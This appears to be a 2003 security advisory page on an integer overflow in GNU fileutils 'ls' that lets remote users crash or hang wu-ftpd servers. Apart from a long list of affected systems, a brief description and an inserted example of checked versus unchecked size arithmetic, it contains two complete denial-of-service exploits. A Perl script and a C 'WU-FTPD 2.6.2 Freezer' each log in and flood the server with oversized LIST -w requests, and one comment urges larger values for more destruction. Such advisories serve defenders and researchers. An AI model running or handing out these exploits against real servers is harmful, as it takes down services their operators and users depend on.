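Published: 2003-10-22
Updated: 2003-11-03
Severity: Medium
Threat level: Remote denial of service
Error type: Boundary check error
Exploitation mode: Server mode
BUGTRAQ ID: 8875
Affected systems
GNU fileutils 4.0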
+Debian Linux 2.2 68k
+Debian Linux 2.2 alpha
+Debian Linux 2.2 arm
+Debian Linux 2.2 IA-32
+Debian Linux 2.2 powerpc
+Debian Linux 2.2 sparc
+Immunix Immunix OS 7+
+RedHat Linux 6.2
+RedHat Linux 6.2 i386
+RedHat Linux 7.0
+RedHat Linux 7.0 i386
+Slackware Linux 7.0
+Slackware Linux 7.1
GNU fileutils 4.0.36
+RedHat Linux 7.1
+RedHat Linux 7.1 i386
+RedHat Linux for iSeries 7.1
+RedHat Linux for pSeries 7.1
GNU fileutils 4.1
+Caldera OpenLinux Server 3.1
+Caldera OpenLinux Server 3.1.1
+Caldera OpenLinux Workstation 3.1
+Caldera OpenLinux Workstation 3.1.1
+RedHat Linux 7.2
+RedHat Linux 7.2 alpha
+RedHat Linux 7.2 i386
+RedHat Linux 7.2 ia64
+RedHat Linux 7.3
+RedHat Linux 7.3 i386
+S.u.S.E. Linux 7.0 alpha
+S.u.S.E. Linux 7.0 i386
+S.u.S.E. Linux 7.0 ppc
+S.u.S.E. Linux 7.0 sparc
+S.u.S.E. Linux 7.1 alpha
+S.u.S.E. Linux 7.1 ppc
+S.u.S.E. Linux 7.1 sparc
+S.u.S.E. Linux 7.1 x86
+S.u.S.E. Linux 7.2 i386
+S.u.S.E. Linux 7.3 i386
+S.u.S.E. Linux 7.3 ppc
+S.u.S.E. Linux 7.3 sparc
+Slackware Linux 8.0
+Sun Cobalt Qube 3
+Sun Cobalt RaQ 4
+Sun Cobalt RaQ 550
+Sun Cobalt RaQ XTR
+Sun Linux 5.0
+Sun Linux 5.0.3
+Sun Linux 5.0.5
+Sun Linux 5.0.6
+Sun LX50
+Trustix Secure Linux 1.1
+Trustix Secure Linux 1.2
+Trustix Secure Linux 1.5
GNU fileutils 4.1.6
+Sun Linux 5.0.6
GNU fileutils 4.1.7
Washington University wu-ftpd 2.4.1
Washington University wu-ftpd 2.4.2 academ[BETA1-15]
+Caldera OpenLinux Standard 1.2
Washington University wu-ftpd 2.4.2 academ[BETA-18]
+RedHat Linux 5.2 i386
Washington University wu-ftpd 2.4.2 VR17
Washington University wu-ftpd 2.4.2 VR16
Washington University wu-ftpd 2.4.2 (beta 18) VR9
Washington University wu-ftpd 2.4.2 (beta 18) VR8
Washington University wu-ftpd 2.4.2 (beta 18) VR7
Washington University wu-ftpd 2.4.2 (beta 18) VR6
Washington University wu-ftpd 2.4.2 (beta 18) VR5
Washington University wu-ftpd 2.4.2 (beta 18) VR4
Washington University wu-ftpd 2.4.2 (beta 18) VR15
Washington University wu-ftpd 2.4.2 (beta 18) VR14
Washington University wu-ftpd 2.4.2 (beta 18) VR13
Washington University wu-ftpd 2.4.2 (beta 18) VR12
Washington University wu-ftpd 2.4.2 (beta 18) VR11
Washington University wu-ftpd 2.4.2 (beta 18) VR10
Washington University wu-ftpd 2.5 .0
+Caldera OpenLinux 2.4
+Caldera OpenLinux Desktop 2.3
+RedHat Linux 6.0
+RedHat Linux 6.0 alpha
+RedHat Linux 6.0 sparc
+SCO eDesktop 2.4
+SCO eServer 2.3
+SCO eServer 2.3.1
Washington University wu-ftpd 2.6 .0
+Cobalt Qube 1.0
+Conectiva Linux 4.0
+Conectiva Linux 4.0 es
+Conectiva Linux 4.1
+Conectiva Linux 4.2
+Conectiva Linux 5.0
+Conectiva Linux 5.1
+Debian Linux 2.2
+Debian Linux 2.2 68k
+Debian Linux 2.2 alpha
+Debian Linux 2.2 arm
+Debian Linux 2.2 powerpc
+Debian Linux 2.2 sparc
-FreeBSD FreeBSD 4.3
-FreeBSD FreeBSD 4.3 -RELEASE
-FreeBSD FreeBSD 4.3 -STABLE
-FreeBSD FreeBSD 4.4
+HP HP-UX 11.0
+HP HP-UX 11.11
+RedHat Linux 5.2 alpha
+RedHat Linux 5.2 i386
+RedHat Linux 5.2 sparc
+RedHat Linux 6.0
+RedHat Linux 6.0 alpha
+RedHat Linux 6.0 sparc
+RedHat Linux 6.1 alpha
+RedHat Linux 6.1 i386
+RedHat Linux 6.1 sparc
+RedHat Linux 6.2 alpha
+RedHat Linux 6.2 i386
+RedHat Linux 6.2 sparc
+S.u.S.E. Linux 6.1
+S.u.S.E. Linux 6.1 alpha
+S.u.S.E. Linux 6.2
+S.u.S.E. Linux 6.3
+S.u.S.E. Linux 6.3 alpha
+S.u.S.E. Linux 6.3 ppc
+S.u.S.E. Linux 6.4
+S.u.S.E. Linux 6.4 alpha
+S.u.S.E. Linux 6.4 ppc
+S.u.S.E. Linux 7.0 alpha
+S.u.S.E. Linux 7.0 i386
+S.u.S.E. Linux 7.0 ppc
+S.u.S.E. Linux 7.0 sparc
+S.u.S.E. Linux 7.1 alpha
+S.u.S.E. Linux 7.1 ppc
+S.u.S.E. Linux 7.1 sparc
+S.u.S.E. Linux 7.1 x86
+S.u.S.E. Linux 7.2 i386
+S.u.S.E. Linux 7.3 i386
+S.u.S.E. Linux 7.3 ppc
+S.u.S.E. Linux 7.3 sparc
+TurboLinux Turbo Linux 4.0
+Wirex Immunix OS 6.2
Washington University wu-ftpd 2.6.1
+Caldera OpenLinux 2.3
+Caldera OpenLinux Server 3.1
+Cobalt Qube 1.0
+Conectiva Linux 6.0
+Conectiva Linux 7.0
+Conectiva Linux 8.0
-FreeBSD FreeBSD 4.3
-FreeBSD FreeBSD 4.3 -RELEASE
-FreeBSD FreeBSD 4.3 -STABLE
-FreeBSD FreeBSD 4.4
-FreeBSD FreeBSD 5.0
-FreeBSD FreeBSD 5.0 alpha
+MandrakeSoft Corporate Server 1.0.1
+MandrakeSoft Linux Mandrake 6.0
+MandrakeSoft Linux Mandrake 6.1
+MandrakeSoft Linux Mandrake 7.0
+MandrakeSoft Linux Mandrake 7.1
+MandrakeSoft Linux Mandrake 7.2
+MandrakeSoft Linux Mandrake 8.0
+MandrakeSoft Linux Mandrake 8.0 ppc
+MandrakeSoft Linux Mandrake 8.1
+RedHat Linux 7.0 alpha
+RedHat Linux 7.0 i386
+RedHat Linux 7.0 sparc
+RedHat Linux 7.1 alpha
+RedHat Linux 7.1 i386
+RedHat Linux 7.1 i586
+RedHat Linux 7.1 i686
+RedHat Linux 7.1 ia64
+RedHat Linux 7.1 noarch
+RedHat Linux 7.2 alpha
+RedHat Linux 7.2 athlon
+RedHat Linux 7.2 i386
+RedHat Linux 7.2 i586
+RedHat Linux 7.2 i686
+RedHat Linux 7.2 ia64
+RedHat Linux 7.2 noarch
-S.u.S.E. Linux 7.0
-S.u.S.E. Linux 7.0 alpha
-S.u.S.E. Linux 7.0 ppc
-S.u.S.E. Linux 7.0 sparc
-S.u.S.E. Linux 7.1
-S.u.S.E. Linux 7.1 alpha
-S.u.S.E. Linux 7.1 ppc
-S.u.S.E. Linux 7.1 sparc
-S.u.S.E. Linux 7.1 x86
-S.u.S.E. Linux 7.2
-S.u.S.E. Linux 7.3
+SCO eDesktop 2.4
+SCO eServer 2.3.1
+SCO Open Server 5.0
+SCO Open Server 5.0.1
+SCO Open Server 5.0.2
+SCO Open Server 5.0.3
+SCO Open Server 5.0.4
+SCO Open Server 5.0.5
+SCO Open Server 5.0.6
+SCO Open Server 5.0.6 a
-Slackware Linux 7.0
-Slackware Linux 7.1
-Slackware Linux 8.0
+TurboLinux TL Workstation 6.1
+TurboLinux Turbo Linux 6.0
+TurboLinux Turbo Linux 6.0.1
+TurboLinux Turbo Linux 6.0.2
+TurboLinux Turbo Linux 6.0.3
+TurboLinux Turbo Linux 6.0.4
+TurboLinux Turbo Linux 6.0.5
+Wirex Immunix OS 7+
+Wirex Immunix OS 7.0
+Wirex Immunix OS 7.0 -Beta
Washington University wu-ftpd 2.6.2
+Compaq Tru64 4.0 b
+Compaq Tru64 4.0 d
+Compaq Tru64 4.0 d PK9 (BL17)
+Compaq Tru64 4.0 e
+Compaq Tru64 4.0 f
+Compaq Tru64 4.0 f PK6 (BL17)
+Compaq Tru64 4.0 f PK7 (BL18)
+Compaq Tru64 4.0 g
+Compaq Tru64 4.0 g PK3 (BL17)
+Compaq Tru64 5.0
+Compaq Tru64 5.0 PK4 (BL17)
+Compaq Tru64 5.0 PK4 (BL18)
+Compaq Tru64 5.0 a
+Compaq Tru64 5.0 a PK3 (BL17)
+Compaq Tru64 5.0 f
+Compaq Tru64 5.1
+Compaq Tru64 5.1 PK3 (BL17)
+Compaq Tru64 5.1 PK4 (BL18)
+Compaq Tru64 5.1 PK5 (BL19)
+Compaq Tru64 5.1 PK6 (BL20)
+Compaq Tru64 5.1 a
+Compaq Tru64 5.1 a PK1 (BL1)
+Compaq Tru64 5.1 a PK2 (BL2)
+Compaq Tru64 5.1 a PK3 (BL3)
+Compaq Tru64 5.1 a PK4 (BL21)
+Compaq Tru64 5.1 a PK5 (BL23)
+Compaq Tru64 5.1 b
+Compaq Tru64 5.1 b PK1 (BL1)
+Compaq Tru64 5.1 b PK2 (BL22)
+Conectiva Linux 9.0
+Debian Linux 3.0
+Debian Linux 3.0 alpha
+Debian Linux 3.0 arm
+Debian Linux 3.0 hppa
+Debian Linux 3.0 ia-32
+Debian Linux 3.0 ia-64
+Debian Linux 3.0 m68k
+Debian Linux 3.0 mips
+Debian Linux 3.0 mipsel
+Debian Linux 3.0 ppc
+Debian Linux 3.0 s/390
+Debian Linux 3.0 sparc
+MandrakeSoft Linux Mandrake 8.2
+MandrakeSoft Linux Mandrake 8.2 ppc
+Sun Linux 5.0.7
Washington University wu-ftpd 2.6.2
+TurboLinux TL Advanced Server 6.0
+TurboLinux TL Server 6.1
+TurboLinux TL Workstation 6.0
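Detailed description
The Coreutils 'ls' command implementation contains an integer overflow. The flaw is in how the program handles the width and column-count command-line arguments: processing an overly large argument causes an integer overflow, and the overflowed value may make the program behave in unexpected ways. Other software that invokes the 'ls' command may be exposed to denial-of-service attacks as a result.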
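The class of flaw described above, shown as an added example that is not taken from the fileutils or wu-ftpd source: an unchecked width-to-table-size computation next to a checked one, as ls itself or a server validating options before passing them to ls could apply it. MIN_COLUMN_WIDTH, MAX_LINE_WIDTH, the 32-bit arithmetic and both function names are assumptions made for illustration.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define MIN_COLUMN_WIDTH 3     /* assumed narrowest column, in characters */
#define MAX_LINE_WIDTH   4096  /* assumed policy cap for a width argument */

/* Unchecked: the width is narrowed to 32 bits and the table size is computed
 * in 32 bits, so an oversized argument wraps instead of failing. */
static uint32_t unchecked_table_bytes(const char *arg, uint32_t elem_size)
{
    uint32_t width = (uint32_t)strtoul(arg, NULL, 10);
    return (width / MIN_COLUMN_WIDTH) * elem_size;
}

/* Checked: returns 0 and stores the byte count in *out, or -1 when the
 * argument is not plain decimal, is out of range, or the size would overflow. */
static int checked_table_bytes(const char *arg, size_t elem_size, size_t *out)
{
    char *end;
    unsigned long width;
    size_t cols;

    if (arg[0] < '0' || arg[0] > '9')
        return -1;                      /* rejects "", "-1", "+5", " 5" */
    errno = 0;
    width = strtoul(arg, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return -1;
    if (width < MIN_COLUMN_WIDTH || width > MAX_LINE_WIDTH)
        return -1;
    cols = width / MIN_COLUMN_WIDTH;
    if (elem_size == 0 || cols > SIZE_MAX / elem_size)
        return -1;
    *out = cols * elem_size;
    return 0;
}

int main(void)
{
    size_t n = 0;
    /* Constructed inputs: 805306368 is 3 * 2^28, so 2^28 columns * 16 bytes wraps to 0. */
    printf("unchecked 805306368 -> %u bytes\n", (unsigned)unchecked_table_bytes("805306368", 16));
    printf("checked   1000000   -> %d\n", checked_table_bytes("1000000", 16, &n));
    if (checked_table_bytes("80", 16, &n) == 0)
        printf("checked   80        -> %zu bytes\n", n);
    return 0;
}
```

The checked form rejects the width value 1000000 used in the test code on this page because it exceeds the assumed cap.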
Test code
#!/usr/bin/perl
# DoS sploit for ls
# tested against wu-ftpd 2.6.2
# coded by (c) druid
# greets to viator
use Net::FTP;
(($target = $ARGV[0])&&($count = $ARGV[1])) || die "usage:$0 <target> <count>";
my $user = "anonymous";
my $pass = "halt\@xyu.com";
$cols=1000000;#you can increase this value for more destructive result ;)
print ":: Trying to connect to target system at: $target...\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect: $!";
print "Connected!\n";
$ftp->login($user, $pass) || die "could not login: $!";
print "Logged in!\n";
$ftp->cwd("/");
while ($count)
{
    $ftp->ls("-w $cols -C");
    $count--;
}
print "Done!\n";
$ftp->quit;
/*
*
*
* http://www.rosiello.org
* (c) Rosiello Security
*
* Copyright Rosiello Security 2003
* All Rights reserved.
*
* Tested on Red Hat 9.0
*
* Author: Angelo Rosiello
* Mail : angelo@rosiello.org
* URL : http://www.rosiello.org
*
* This software is only for educational purpose.
* Do not use it against machines different from yours.
* Respect law.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

void addr_initialize( );
void usage( );

int main( int argc, char **argv )
{
    int i, sd, PORT, loop, error;
    char user[30], password[30], ch = '\0';
    struct sockaddr_in server_addr;

    fprintf( stdout, "\n(c) Rosiello Security 2003\n" );
    fprintf( stdout, "http://www.rosiello.org\n" );
    fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );

    if( argc != 6 ) usage( argv[0] );
    /* user[] and password[] hold 30 bytes, so cap both arguments */
    if( strlen( argv[3] ) > 20 ) exit( 0 );
    if( strlen( argv[4] ) > 20 ) exit( 0 );
    sprintf( user, "USER %s\n", argv[3] );
    sprintf( password, "PASS %s\n", argv[4] );
    PORT = atoi( argv[2] );
    loop = atoi( argv[5] );

    addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));
    sd = socket( AF_INET, SOCK_STREAM, 0 );
    error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));
    if( error != 0 )
    {
        perror( "Something wrong with the connection" );
        exit( 0 );
    }

    /* read the server banner up to the first newline */
    while ( ch != '\n' )
    {
        recv( sd, &ch, 1, 0);
        printf("%c", ch );
    }
    ch = '\0';
    printf( "Connection executed, now waiting to log in...\n" );

    printf( "%s", user );
    send( sd, user, strlen( user ), 0 );
    while ( ch != '\n' )
    {
        recv( sd, &ch, 1, 0);
        printf("%c", ch );
    }

    printf( "%s", password );
    ch = '\0';
    send( sd, password, strlen( password ), 0 );
    while ( ch != '\n' )
    {
        recv( sd, &ch, 1, 0);
        printf("%c", ch );
    }

    printf( "Sending the DoS query\n" );
    for( i=0; i<loop; i++ )
    {
        write( sd, "LIST -w 1000000 -C\n", 19 );
    }
    printf( "All done\n" );
    close( sd );
    return 0;
}

void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
{
    address -> sin_family = AF_INET;
    address -> sin_port = htons((u_short)port);
    address -> sin_addr.s_addr = IPaddr;
}

void usage( char *program )
{
    fprintf(stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n", program);
    exit(0);
}
Solution
Vendors have fixed this vulnerability in the latest versions of the fileutils package.
Related information
WU-FTPD 2.6.2 Freezer
http://archives.neohapsis.com/archives/bugtraq/2003-10/0331.html